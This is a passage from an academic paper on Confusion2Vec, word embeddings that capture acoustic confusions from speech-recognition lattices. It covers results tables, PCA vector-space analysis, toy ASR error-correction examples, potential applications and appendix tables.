dimension baseline from Table 7 with the previous 300 dimensional baseline from Table 6, the results are almost identical which confirms the dimension expansion is insignificant with respect to performance. With model concatenation, we see slightly better results (average analogy accuracy) comparing with the pre-trained models from Table 6, an absolute increase of up-to approximately 5% among the best results. The correlations with similarity tasks are similar and comparable with the earlier results with the pre-trained models. Joint optimization Fixed contextual subspace Rows 6–14 of Table 7 display the results of joint optimization with concatenated, fixed top-confusion (C2V-1) embeddings and learn-able confusion2vec (C2V-a/c/�) embeddings. As hypothesized with fixed subspace, the results indicate better accuracies for the Semantic&Syntactic analogy task. Thereby, the improvements also reflect on the overall average accuracy of the analogy tasks. This also confirms the need for joint optimization which boosts the average accuracy up-to approximately 2% absolute over the unoptimized concatenated model. Unrestricted optimization The last nine rows of Table 7 display the results obtained by jointly optimizing the concatenated models without constraints. Both the subspaces are fine tuned to convergence with various proposed training criteria. We consistently observe improvements with the unrestricted optimization over the unoptimized model concatenations. In terms of average accuracy we observe an increase in average accuracy by up-to 5% (absolute) approximate over the unoptimized concatenated models. Moreover, we obtain Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 23/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ improvements over the fixed contextual subspace joint-optimized models, up-to 2–3% (absolute) in average accuracies. The best overall model in terms of average accuracies is obtained by unrestricted joint optimization on the concatenated top-confusion and inter-confusion models by fine-tuning with the intra-confusion training scheme. Results summary Firstly, comparing among the different training schemes (see Table 5), the inter-confusion training consistently gives the best Acoustic analogy accuracies, whereas the hybrid Table 7 Model concatenation and joint optimization results. Model Fine-tuning scheme Analogy tasks Similarity tasks S&S Acoustic S&S–acoustic Average Word Acoustic Google W2V – 61.42% 0.9% 16.99% 26.44% 0.6893 -0.3489 In-domain W2V (556 dim.) – 63.6% 0.81% 14.54% 26.32% 0.6333 -0.4717 Model concatenation C2V-1 (F) + C2V-a (F) – 67.03% 25.43% 40.36% 44.27% 0.5102 0.7231 C2V-1 (F) + inter-confusion (F) – 70.84% 35.25% 35.18% 47.09% 0.5609 0.6345 C2V-1 (F) + hybrid intra-inter (F) – 68.08% 11.39% 41.3% 40.26% 0.4142 0.5285 Fixed contextual subspace joint optimization C2V-1 (F) + C2V-a (L) Inter 71.65% 20.54% 33.76% 41.98% 0.5676 0.4437 C2V-1 (F) + C2V-a (L) Intra 67.37% 28.64% 39.09% 45.03% 0.5211 0.6967 C2V-1 (F) + C2V-a (L) Hybrid 70.02% 25.84% 37.18% 44.35% 0.5384 0.6287 C2V-1 (F) + C2V-c (L) Inter 72.01% 35.25% 33.58% 46.95% 0.5266 0.5818 C2V-1 (F) + C2V-c (L) Intra 69.7% 39.32% 39.07% 49.36% 0.5156 0.7021 C2V-1 (F) + C2V-c (L) Hybrid 72.38% 37.75% 37.95% 49.36% 0.5220 0.6674 C2V-1 (F) + C2V-* (L) Inter 71.36% 8.55% 33.21% 37.71% 0.5587 0.302 C2V-1 (F) + C2V-* (L) Intra 66.85% 13.33% 40.1% 40.09% 0.4996 0.5691 C2V-1 (F) + C2V-* (L) Hybrid 68.32% 11.61% 38.19% 39.37% 0.5254 0.4945 Unrestricted joint optimization C2V-1 (L) + C2V-a (L) Inter 62.12% 46.42% 36.4% 48.31% 0.5513 0.7926 C2V-1 (L) + C2V-a (L) Intra 64.85% 40.55% 42.38% 49.26% 0.5033 0.7949 C2V-1 (L) + C2V-a (L) Hybrid 31.65% 61.91% 23.55% 39.04% 0.1067* 0.8309 C2V-1 (L) + C2V-c (L) inter 64.98% 52.99% 34.79% 50.92% 0.5763 0.7725 C2V-1 (L) + C2V-c (L) Intra 65.88% 49.4% 41.51% 52.26% 0.5379 0.7717 C2V-1 (L) + C2V-c (L) Hybrid 37.86% 67.21% 25.96% 43.68% 0.2295 0.8294 C2V-1 (L) + C2V-* (L) Inter 65.54% 27.97% 36.87% 43.46% 0.5338 0.6953 C2V-1 (L) + C2V-* (L) Intra 64.42% 20.05% 42.56% 42.34% 0.4920 0.6942 C2V-1 (L) + C2V-* (L) Hybrid 65.79% 22.63% 41.3% 43.24% 0.4967 0.6986 Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter. All the models are of 556 (300 + 256) dimensions. Acronyms: (F):Fixed embedding, (L):Learn embedding during joint training, S&S: Semantic & Syntactic analogy. For the analogy tasks: the accuracies of baseline word2vec models are for top-1 evaluations, whereas of the other models are for top-2 evaluations (as discussed in the section “Analogy Tasks”). Detailed semantic analogy and syntactic analogy accuracies, the top-1 evaluations and top-2 evaluations for all the models are available under Appendix in Table A5. For the similarity tasks: all the correlations (Spearman’s) are statistically significant with p < 0.001 except the ones with the asterisks. Detailed p-values for the correlations are presented under Appendix in Table A6. Bold entries correspond to the best results in their respective tasks. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 24/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ training scheme often gives the best Semantic&Syntactic–Acoustic analogy accuracies. As far as the Semantic&Syntactic analogy task is concerned, the intra-confusion is often found to give preference to syntactic relations, while the inter-confusion boosts the semantic relations and the hybrid scheme balances both relations (see Table A1). Next, pre-training/initializing the model gives drastic improvements in overall average accuracy of analogy tasks. Concatenating the top-confusion model with the confusion2vec (C2V-a/c/�) model gives slightly better results. More optimizations and fine-tuning over the concatenated model gives considerably the best results. Overall, the best results are obtained with unrestricted joint optimization of top- confusion and inter-confusion model, that is, fine-tuning using intra-confusion training mode. In terms of average analogy accuracies the confusion2vec model (C2V-a/c/�) outperforms the baseline by up-to 26.06%. The best performing confusion2vec model outperforms the word2vec model even on the Semantic&Syntactic analogy tasks (by a relative 7.8%). Moreover, even the comparison between the top-2 evaluations of both the word2vec and confusion2vec (C2V-1/a/c/�) suggests very similar performance on Semantic&Syntactic-analogy tasks (see Table A5). This confirms and emphasizes that the confusion2vec (C2V-1/a/c/�) doesn’t compromise on the information captured by word2vec but succeeds in augmenting the space with word confusions. Another highlight observation is that modeling the word confusions boost the semantic and syntactic scores of the Semantic&Syntactic analogy task (compared to word2vec), suggesting inherent information in word confusions which could be exploited for better semantic-syntactic word relation modeling. VECTOR SPACE ANALYSIS In this section, we compare the vector space plots of the typical word2vec space and the proposed confusion2vec vector space for a specifically chosen set of words. We choose a subset of words representing three categories to reflect semantic relationships, syntactic relationships and acoustic relationships. The vector space representations of the words are then subjected to dimension reduction using principle component analysis (PCA) to obtain 2D vectors which are used for plotting. Semantic relationships For analyzing the semantic relationships, we compile random word pairs (constrained by the availability of these in our training data) representing Country–Cities relationships. The 2D plot for baseline pre-trained word2vec model is shown in Fig. 7 and for the proposed confusion2vec model, specifically for the randomly selected, jointly-optimized top-confusion + intra-confusion model (corresponding to row 7 in Table 7) is displayed in Fig. 8. The following observations can be made comparing the two PCA plots: � Examining the baseline word2vec model, we find the Cities are clustered over the upper half of the plot (highlighted with blue hue in Fig. 7) and Countries are clustered together at the bottom half (highlighted with red hue in Fig. 7). Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 25/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ � Similar trends are observed with the proposed confusion2vec model, where the cities are clustered together over the right half of the plot (highlighted with blue hue in Fig. 8) and the countries are grouped together toward the left half (highlighted with red hue in Fig. 8). � In the Word2Vec space, the vectors of Country–City word pairs are roughly parallel, pointing north-east (i.e., vectors are approximately similar). � Similar to the word2vec space, with the Confusion2Vec, we observe the vectors of Country–City word pairs are fairly parallel and point to the east (i.e., vectors are highly similar).The four observations indicate that the Confusion2Vec preserves the Semantic relationships between the words (similar to the Word2Vec space). Syntactic relationships To analyze the syntactic relationships, we create 30 pairs of words composed of Adjective- Adverb, Opposites, Comparative, Superlative, Present-Participle, Past-tense, Plurals. The PCA 2D plots for baseline pre-trained word2vec model and the proposed confusion2vec model are illustrated in Figs. 9 and 10, respectively. The following inferences can be made from the two plots: � Inspecting the baseline word2vec model, we observe that the word pairs depicting syntactic relations occur often close-by (highlighted with red ellipses in Fig. 9). � Few semantic relations are also apparent and are highlighted with blue ellipses in Fig. 9. For example, animals are clustered together. � Similarly, with the Confusion2Vec model, we observe syntactic clusters of words highlighted with red ellipses in Fig. 10. � Semantic relations apparent in the case of word2vec is also evident with the Confusion2Vec, which are highlighted with blue ellipses in Fig. 10. � Additionally, with the Confusion2Vec model, we find clusters of acoustically similar words (with similar phonetic transcriptions). These are highlighted using a green ellipse in Fig. 10. The above findings confirm that the confusion2vec models preserve the syntactic relationships similar to word2vec models, supporting our hypothesis. Acoustic relationships In order to analyze the relationships of similar sounding words in the word vector spaces under consideration, we compose 20 pairs of acoustically similar sounding words, with similar phonetic transcriptions. The 2D plot obtained after PCA for the baseline word2vec model is shown in Fig. 11 and the proposed confusion2vec model is shown in Fig. 12. We make the following observations from the two figures: � Observing the baseline Word2vec model, no apparent trends are found between the acoustically similar words. For example, there is no trivial relationships apparent from the plot in Fig. 11 between the word “no” and “know,” “try” and “tri,” etc. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 26/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Word2vec Relationships of countries-cities Figure 7 2D plot after PCA of word vector representation on baseline pre-trained word2vecF. Demonstration of semantic relationship on randomly chosen pairs of countries and cities. Country-city vectors are almost parallel/similar. Countries are clustered together on the bottom half (highlighted with red hue) and the cities on upper half (highlighted with blue hue). Full-size DOI: 10.7717/peerj-cs.195/fig-7 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 27/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-7 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Confusion2Vec (Joint training) Relationships of countries-cities Figure 8 2D plot after PCA of word vector representation on jointly optimized pre-trained C2V-1 + C2V-a models. Demonstration of semantic relationship on randomly chosen pairs of countries and cities. Observe the semantic relationships are preserved as in the case of word2vec model: country-city vectors are almost parallel/similar. Countries are clustered together on the left half (highlighted with red hue) and the cities on right half (highlighted with blue hue). Full-size DOI: 10.7717/peerj-cs.195/fig-8 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 28/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-8 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Word2vec Semantic/Syntactic illustration via PCA Figure 9 2D plot after PCA of word vector representation on baseline pre-trained word2vec. Demonstration of syntactic relationship on randomly chosen 30 pairs of adjective-adverb, opposites, comparative, superlative, present-participle, past-tense, plurals. Observe the clustering of syntactically related words (Ex: highlighted with red ellipses). Few semantically related words are highlighted with blue ellipses (Ex: animals). Full-size DOI: 10.7717/peerj-cs.195/fig-9 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 29/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-9 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Confusion2Vec (Joint training) Semantic/Syntactic illustration via PCASemantic/Syntactic illustration via PCA Acoustic and Syntactic/ Semantic Cluster Figure 10 2D plot after PCA of word vector representation on jointly optimized pre-trained C2V-1 + C2V-a models. Demonstration of syntactic relationship on randomly chosen 30 pairs of adjective-adverb, opposites, comparative, superlative, present-participle, past-tense, plurals. Syntactic clustering is preserved by confusion2vec similar to word2vec. Red ellipses highlight few examples of syntactically related words. Similar to word2vec, semantically related words (Ex: animals), highlighted with blue ellipses, are also clustered together. Additionally confusion2vec clusters acoustically similar words together (indicated with green ellipse). Full-size DOI: 10.7717/peerj-cs.195/fig-10 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 30/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-10 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Word2vec Acoustic siimilarity illustration via PCA - No obvious clustering Figure 11 2D plot after PCA of word vector representation on baseline pre-trained word2vec. Demonstration of vector relationship on randomly chosen 20 pairs of acoustically similar sounding words. No apparent relations between acoustically similar words are evident. Full-size DOI: 10.7717/peerj-cs.195/fig-11 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 31/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-11 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Confusion2Vec (Joint training) Acoustic siimilarity illustration via PCA - Clear clustering Acoustic and Syntactic Cluster Figure 12 2D plot after PCA of word vector representation on jointly optimized pre-trained C2V-1 + C2V-a models. Demonstration of vector relationship on randomly chosen 20 pairs of acoustically similar sounding words. Confusion2Vec clusters acoustically similar words together (highlighted with blue ellipses). Additionally, inter-relations between syntactically related words and acoustically related words are also evident (highlighted with a green ellipse). Full-size DOI: 10.7717/peerj-cs.195/fig-12 Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 32/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-12 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ � However, inspecting the proposed confusion2vec model, there is an obvious trend apparent, the acoustically similar words are grouped together in pairs and occur roughly in similar distances. The word pairs are highlighted with blue ellipses in Fig. 12. � Additionally, in Fig. 12, as highlighted in a green ellipse, we observe the four words “no,” “not,” “knot,” and “know” occur in close proximity. The word pair “no” and “not” portray semantic/syntactic relation whereas the pairs “knot” & “not” and “no” & “know” are acoustically related. The above findings suggest that the word2vec baseline model fails to capture any acoustic relationships whereas the proposed confusion2vec successfully models the confusions present in the lattices, in our specific case the acoustic confusions from the ASR lattices. DISCUSSION In this section, we demonstrate why the proposed embedding space is superior for modeling word lattices with the support of toy examples. Let’s consider a simple task of ASR error correction. As shown by Allauzen (2007), Ogata & Goto (2005) and Shivakumar et al. (2018), often, the information needed to correct the errors are embedded in the lattices. The toy examples in Figs. 13A and 13B depict the real scenarios encountered in ASR. The lattice feature representation is a weighted vector sum of all words in the confusion and its context present in the lattice (see Fig. 14). We compare the proposed confusion2vec embeddings with the popular word2vec using cosine similarity as the evaluation measure. Table 8 lists the evaluation for the following cases: (i) ASR output is correct, (ii) ASR output is wrong and the correct candidate is present in the lattice, (iii) ASR output is wrong and the correct candidate is absent from the lattice, and (iv) ASR output is wrong and with no lattice available. The following observations are drawn from the results: (1) Confusion2vec shows higher similarity with the correct answers when the ASR output is correct (see Table 8; Example 1.1, 2.1). (2) Confusion2vec exhibits higher similarity with the correct answers when the ASR output is wrong—meaning the representation is closer to the correct candidate and therefore more likely to correct the errors (see Table 8; Example 1.2, 2.2, 1.3, 2.3). (3) Confusion2vec yields high similarity even when the correct word candidate is not present in the lattice—meaning confusion2vec leverages inherent word representation knowledge to aid re-introduction of pruned or unseen words during error correction (see Table 8; Example 1.4, 1.5, 1.6). (4) The confusion2vec shows low similarity in the case of fake lattices with highly unlikely word alternatives (see Table 8; Example 2.4, 2.5). All the above observations are supportive of the proposed confusion2vec word representation and is in line with the expectations for the task of ASR error correction. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 33/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ POTENTIAL APPLICATIONS In addition to the above discussed ASR error correction task, other potential applications include: Machine Translation: In Machine Translation, word lattices are used to provide multiple sources for generating a single translation (Schroeder, Cohn & Koehn, 2009; Dyer, 2010). Word lattices derived from reordered hypotheses 0 1 yes:yes/1 2 write:write/0.75 right:right/0.25 3 answer:answer/1 (a) Example 1 0 1 she:she/0.4 shea:shea/0.6 2 likes:likes/1 3 sea:sea/0.45 see:see/0.55 (b) Example 2 Figure 13 Confusion network examples. Full-size DOI: 10.7717/peerj-cs.195/fig-13 w t,1 w t,2 w t,3 C(t) P(w t,1 ))) P(w t,2 ) P(w t,3 ) w t-1,1 w t-1,2 w t-1,3 C(t-1) P(w t-1,1 ) P(w t-1,2 ) P))P(w t-1,3 ) w t+1,1 w t+1,2 w t+1,3 C(t+1) P(w t+1,1 )))P(w t+1,2 )) P(w t+1,3 ) Sum Feature Vector Figure 14 Computation of lattice feature vector. Full-size DOI: 10.7717/peerj-cs.195/fig-14 Table 8 Cosine similarity between the ASR ground-truth and ASR output in application to ASR error correction for baseline pre-trained word2vec and the proposed confusion2vec: jointly optimized intra-confusion + top-confusion models. Example Ground-truth ASR output W2V similarity C2V similarity 1.1 “Yes right answer” “Yes (right/write) answer” 0.96190 0.96218 1.2 “Yes right answer” “Yes write answer” 0.93122 0.93194 1.3 “Yes write answer” “Yes (right/write) answer” 0.99538 0.99548 1.4 “Yes rite answer” “Yes (right/write) answer” 0.84216 0.88206 1.5 “Yes rite answer” “Yes right answer” 0.86003 0.87085 1.6 “Yes rite answer” “Yes write answer” 0.82073 0.87034 2.1 “She likes sea” “(She/shea) likes (see/sea)” 0.91086 0.92130 2.2 “She likes sea” “Shea likes see” 0.73295 0.77137 2.3 “Shea likes see” “(She/shea) likes (see/sea)” 0.94807 0.95787 2.4 “Shea likes see” “(She/shea) likes (see/rocket)” 0.93560 0.93080 2.5 “She likes sea” “(She/shea) likes (see/rocket)” 0.85853 0.85757 Note: Examples 1.1–1.6 inherits structure as in Fig. 13A, that is, “yes (right/write) answer” assigns weight of 1.0 to yes and answer, 0.75 to right, 0.25 to write. Similarly Examples 2.1–2.5 inherits structure as in Fig. 13B. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 34/49 http://dx.doi.org/10.7717/peerj-cs.195/fig-13 http://dx.doi.org/10.7717/peerj-cs.195/fig-14 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ (Costa-Jussà & Fonollosa, 2007; Niehues & Kolss, 2009; Hardmeier, Bisazza & Federico, 2010), morphological transformations (Dyer, 2007; Hardmeier, Bisazza & Federico, 2010), word segmentations (Dyer, 2009), paraphrases (Onishi, Utiyama & Sumita, 2011) are used to introduce ambiguity and alternatives for training machine translation systems (Wuebker & Ney, 2012; Dyer, Muresan & Resnik, 2008; Dyer, 2010). Source language alternatives can also be exploited by introducing ambiguity derived from the combination of multiple machine translation systems (Matusov, Ueffing & Ney, 2006; Rosti et al., 2007a; Rosti, Matsoukas & Schwartz, 2007b). In the case of Machine Translation, the word-confusion subspace is associated with morphological transformations, word segmentations, paraphrases, part-of-speech information, etc., or a combination of them. Although the word-confusion subspace is not orthogonal, the explicit modeling of such ambiguity relationships is beneficial. NLP: Other NLP based applications like paraphrase generation (Quirk, Brockett & Dolan, 2004), word segmentation (Kruengkrai et al., 2009), part-of-speech tagging (Kruengkrai et al., 2009) also operate on lattices. As discussed in the section “Machine Learning Algorithms,” confusion2vec can exploit the ambiguity present in the lattices for the betterment of the tasks. ASR: In ASR systems, word lattices and confusion networks are often re-scored using various algorithms to improve their performances by exploiting ambiguity (Sundermeyer et al., 2014; Mangu, Brill & Stolcke, 2000; Xiong et al., 2016; Liu et al., 2014). In the case of ASR, the word-confusion subspace is associated with the acoustic similarity of words which is often orthogonal to the semantic-syntactic subspace as discussed in the section “Human Speech Production, Perception and Hearing.” Examples 1–3 are prime cases supporting the need for jointly modeling acoustic word confusions and semantic-syntactic subspace. Spoken Language Understanding: Similarly, as in the case of ASR, Confusion2Vec could exploit the inherent acoustic word-confusion information for keyword spotting (Mangu, Brill & Stolcke, 2000), confidence score estimation (Mangu, Brill & Stolcke, 2000; Seigel & Woodland, 2011; Kemp & Schaaf, 1997; Jiang, 2005), domain adaptation (Shivakumar et al., 2018), lattice compression (Mangu, Brill & Stolcke, 2000), spoken content retrieval (Chelba, Hazen & Saraclar, 2008; Hori et al., 2007), system combinations (Mangu, Brill & Stolcke, 2000; Hoffmeister et al., 2007), and other spoken language understanding tasks (Hakkani-Tür et al., 2006; Tur et al., 2002; Marin et al., 2012) which operate on lattices. Speech Translation: In speech translation systems, incorporating the word lattices and confusion networks (instead of the single top hypothesis) is beneficial in better integrating speech recognition system to the machine translation systems (Bertoldi, Zens & Federico, 2007; Mathias & Byrne, 2006; Matusov, Kanthak & Ney, 2005; Schultz et al., 2004). Similarly, exploiting uncertainty information between the “ASR —Machine Translation—Speech synthesis” systems for speech-to-speech translation is useful (Lavie et al., 1997; Wahlster, 2013). Since speech translation involves combination of ASR and the Machine Translation systems, the word-confusion Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 35/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ subspace is associated with a combination of acoustic word-similarity (for ASR) and morphological-segmentation-paraphrases ambiguities (for Machine Translation). “See son winter is here” / “voir fils hiver est ici” (Example 4) “Season winter is here” / “saison hiver est ici” (Example 5) Examples 4 and 5 demonstrate a case of speech translation of identically sounding English phrases to French. Words “See son” and “Season” demonstrate ambiguity in terms of word segmentation. Whereas, the phrases “See son” and “Season” also exhibit ambiguity in terms of acoustic similarity. By modeling both word-segmentation and acoustic-confusion through word vector representations, the confusion2vec can provide crucial information that the French words “voir” and “saison” are confusable under speech translation framework. Optical Character Recognition: In optical character recognition (OCR) systems, the confusion axis is related to pictorial structures of the characters/words. For example, say the characters “a” and “o” are easily confusable thus leading to similar character vectors in the embedding space. In the case of word level confusions leading to words “ward” and “word” being similar with confusion2vec (word2vec would have the words “word” and “ward” fairly dissimilar). Having this crucial optical confusion information is useful during OCR decoding on sequence of words when used in conjunction with the linguistic contextual information. Image/Video Scene Summarization: The task of scene summarization involves generating descriptive text summarizing the content in one or more images. Intuitively, the task would benefit from linguistic contextual knowledge during the text generation. However, with the confusion2vec, one can model and expect to capture two additional information streams (i) pictorial confusion of image/object recognizer, and (ii) pictorial context, that is, modeling objects occurring together (e.g., we can expect oven to often appear nearby a stove or other kitchen appliances). The additional streams of valuable information embedded in the lattices can contribute for better decoding. In other words, for example, word2vec can exhibit high dissimilarity between the words “lifebuoy” and “donuts”, however, the confusion2vec can capture their pictorial similarity in a better word space representation and thus aiding in their end application of scene summarization. CONCLUSION In this work, we proposed a new word vector representation motivated from human speech and perception and aspects of machine learning for incorporating word confusions from lattice like structures. The proposed confusion2vec model is meant to capture additional word-confusion information and improve upon the popular word2vec models without compromising the inherent information captured by the word2vec models. Although the word confusions could be domain/task specific, we present a case study on ASR lattices where the confusions are based on acoustic similarity of words. Specifically, with respect to ASR related applications, the aim is to capture the contextual statistics, as with word2vec, and additionally also capture the acoustic word Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 36/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ confusion statistics. Several training configurations are proposed for confusion2vec model, each utilizing different degrees of acoustic confusability vs. contextual information, present in the noisy (confusion network) ASR output, for modeling the word vector space. Further, techniques like pre-training/initializations, model concatenation and joint optimization are proposed and evaluated for the confusion2vec models. Appropriate evaluation schemes are formulated for the domain specific application. The evaluation schemes are inspired from the popular analogy based question test set and word similarity tasks. A new analogy task and word similarity tasks are designed for the acoustic confusion/similarity scenario. A detailed tabulation of results are presented for the confusion2vec model and compared to the baseline word2vec models. The results show that the confusion2vec can augment additional task-specific word confusion information without compromising on the semantic and syntactic relationships captured by the word2vec models. Next, detailed analysis is conducted on the confusion2vec vector space through PCA reduced two-dimensional plots for three independent word relations: (i) Semantic relations, (ii) Syntactic relations, and (iii) Acoustic relations. The analysis further supports our aforementioned experimental inferences. Few toy examples are presented toward the task of ASR error correction to support the adequacy of the Confusion2vec over the word2vec word representations. The study validates through various hypotheses and test results, the potential benefits of the confusion2vec model. FUTURE WORK In the future, we plan to work on improving the confusion2vec model by incorporating the sub-word and phonemic transcription of words during training. Sub-words and character transcription information is shown to improve the word vector representation (Bojanowski et al., 2017; Chen et al., 2015). We believe the sub-words and phoneme transcriptions of words are even more relevant to confusion2vec. In addition to the improvements expected toward the semantic and syntactic representations (word2vec), since the sub-words and phoneme transcriptions of acoustically similar words are similar, it should help in modeling the confusion2vec to a much greater extent. Apart from concentrating on improving the confusion2vec model, this work opens new possible opportunities in incorporating the confusion2vec embeddings to a whole range of full-fledged applications such as ASR error correction, speech translation tasks, machine translation, discriminative language models, optical character recognition, image/video scene summarization, etc. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 37/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ APPENDIX Table A1 Analogy task results with Semantic&Syntactic splits: different proposed models. Model Analogy tasks Semantic&Syntactic analogy Acoustic analogy Semantic&Syntactic–acoustic analogy Average accuracy Semantic Syntactic Semantic& Syntactic Semantic– acoustic Syntactic– acoustic Semantic& Syntactic– acoustic Google W2V 28.98% (35.75%) 70.79% (78.74%) 61.42% (69.1%) 0.9% (1.42%) 6.54% (14.38%) 17.9% (27.46%) 16.99% (26.42%) 26.44% (32.31%) In-domain W2V 42.39% (51.57%) 33.14% (43.14%) 35.15% (44.98%) 0.3% (0.6%) 5.17% (10.69%) 8.13% (11.93%) 7.86% (11.82%) 14.44% (19.13%) C2V-1 38.33% (46.7%) 33.1% (42.36%) 34.27% (43.33%) 0.7% (1.16%) 11.76% (14.38%) 11.23% (15.11%) 11.27% (15.05%) 15.41% (19.85%) C2V-a 0.51% (0.78%) 18.59% (28.17%) 14.54% (22.03%) 41.93% (52.58%) 0.98% (2.29%) 9.62% (15.67%) 8.94% (14.61%) 21.8% (29.74%) C2V-c 16.15% (23.7%) 26.14% (39.74%) 23.9% (36.15%) 48.58% (60.57%) 3.27% (6.86%) 12.13% (21.61%) 11.42% (20.44%) 27.97% (39.05%) C2V-* 2.07% (2.58%) 28.91% (38.6%) 22.89% (30.53%) 40.78% (53.55%) 1.96% (2.94%) 20.99% (31.63%) 19.48% (29.35%) 27.72% (37.81%) Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*: hybrid intra-inter. All the models are of 256 dimensions except Google W2V (300 dimensions). Numbers inside parenthesis indicate top-2 evaluation accuracy; Numbers outside parenthesis represent top-1 evaluation accuracy. Google Word2Vec, Word2Vec Groundtruth (trained on in-domain) and Baseline Word2Vec (trained on ASR transcriptions) perform better with the Semantic&Syntactic tasks, but fares poorly with acoustic analogy task. Intra-confusion performs well on acoustic analogy task while compromising on Semantic&Syntactic task. Inter-confusion performs well on both the acoustic analogy and Semantic&Syntactic tasks. Hybrid intra-inter training performs fairly well on all the three analogy tasks (acoustic, Semantic&Syntactic and Semantic&Syntactic–acoustic). Table A2 Similarity task results: different proposed models. Model Similarity tasks Word similarity Acoustic similarity Google W2V 0.6893 (7.9e-48) -0.3489 (2.2e-28) In-domain W2V 0.5794 (4.2e-29) -0.2444 (1e-10) C2V-1 0.4992 (3.3e-22) 0.1944 (1.7e-9) C2V-a 0.105 (0.056) 0.8138 (5.1e-224) C2V-c 0.2937 (5.4e-8) 0.8055 (5.1e-216) C2V-* 0.0963 (0.08) 0.7858 (1.5e-198) Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter. Similarity in terms of Spearman’s correlation. All the models are of 256 dimensions except Google W2V (300 dimensions). Numbers inside parenthesis indicate correlation p-value for similarity tasks Google Word2Vec, Baseline Word2Vec, and Word2Vec Groundtruth, all show high correlations with word similarity, while showing poor correlations on acoustic similarity. Google Word2Vec and Word2Vec Groundtruth models trained on clean data exhibit negative acoustic similarity correlation. Baseline Word2Vec trained on noisy ASR shows a small positive acoustic similarity correlation. Intra-confusion, inter-confusion, and hybrid intra-inter training show higher correlations on acoustic similarity. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 38/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Table A3 Analogy task results with Semantic&Syntactic splits: model pre-training/initialization. Model Analogy tasks Semantic&Syntactic analogy Acoustic analogy Semantic&Syntactic–acoustic analogy Average accuracy Semantic Syntactic Semantic& Syntactic Semantic– acoustic Syntactic– acoustic Semantic& Syntactic– acoustic Google W2V 28.98% (35.75%) 70.79% (78.74%) 61.42% (69.1%) 0.9% (1.42%) 6.54% (14.38%) 17.9% (27.46%) 16.99% (26.42%) 26.44% (32.31%) In-domain W2V 32.72% (39.99%) 66.53% (75.97%) 59.17% (68.14%) 0.6% (0.96%) 10.52% (17.46%) 10.5% (17.69%) 8.15% (13.5%) 22.64% (27.53%) C2V-1 34.92% (41.96%) 68.7% (78.82%) 61.13% (70.56%) 0.9% (1.46%) 14.38% (19.28%) 16.85% (24.25%) 16.66% (23.86%) 26.23% (31.96%) C2V-a 11.5% (15.53%) 67.56% (77.96%) 54.99% (63.97%) 9.04% (16.92%) 7.84% (10.46%) 36.92% (46.17%) 34.61% (43.34%) 32.88% (41.41%) C2V-c 25.77% (33.12%) 60.1% (74.79%) 52.4% (65.45%) 16.54% (27.33%) 10.78% (14.05%) 28.9% (40.38%) 27.46% (38.29%) 32.13% (43.69%) C2V-* 15.64% (21.94%) 66.73% (77.68%) 55.28% (65.19%) 10.49% (20.35%) 6.86% (11.11%) 35.4% (44.85%) 33.13% (42.18%) 36.27% (42.57%) Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter. All the models are of 300 dimensions. Numbers inside parenthesis indicate top-2 evaluation accuracy; Numbers outside parenthesis represent top-1 evaluation accuracy. Pre-training is helpful in all the cases. Pre-training boosts the Semantic&Syntactic analogy accuracy for all. For intra-confusion, inter-confusion and hybrid intra-inter 